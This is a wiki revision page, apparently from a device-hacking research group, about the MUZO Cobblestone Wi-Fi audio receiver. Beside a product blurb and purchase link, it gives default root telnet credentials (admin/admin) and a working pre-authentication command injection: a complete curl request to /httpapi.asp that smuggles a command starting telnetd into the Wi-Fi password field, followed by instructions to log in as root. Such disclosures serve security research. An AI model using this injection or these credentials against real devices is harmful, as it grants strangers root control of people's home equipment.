Difference between revisions of "MUZO Cobblestone"
0x00string (talk | contribs) |
|||
Line 14: | Line 14: | ||
==Telnet Default Credentials== | ==Telnet Default Credentials== | ||
The device permits logins with root permissions with the username of <code>admin</code> and password of <code>admin</code> | |||
==Pre Auth Root Command Injection== | ==Pre Auth Root Command Injection== |
Revision as of 00:45, 11 August 2017
"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."
MUZO Cobblestone
"MUZO Cobblestone is a Wi-Fi Audio Receiver that makes your speakers wireless. Now you can control music play to your speakers without having to connect your audio cable to your speakers. Cobblestone is easy to set-up. Just connect your Cobblestone to your speaker, amplifier or receiver, and configure your Cobblestone to your home Wi-Fi network with our MUZO Player app and start streaming your favorite music. It’s as easy as that. AirPlay multi-room is supported for Cobblestones and not yet supported for 3rd party Airplay devices."
Purchase
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the MUZO Cobblestone at Amazon
Telnet Default Credentials
The device permits logins with root permissions with the username of admin
and password of admin
Pre Auth Root Command Injection
Target: /httpapi.asp
curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed
Connect to the telnet service as root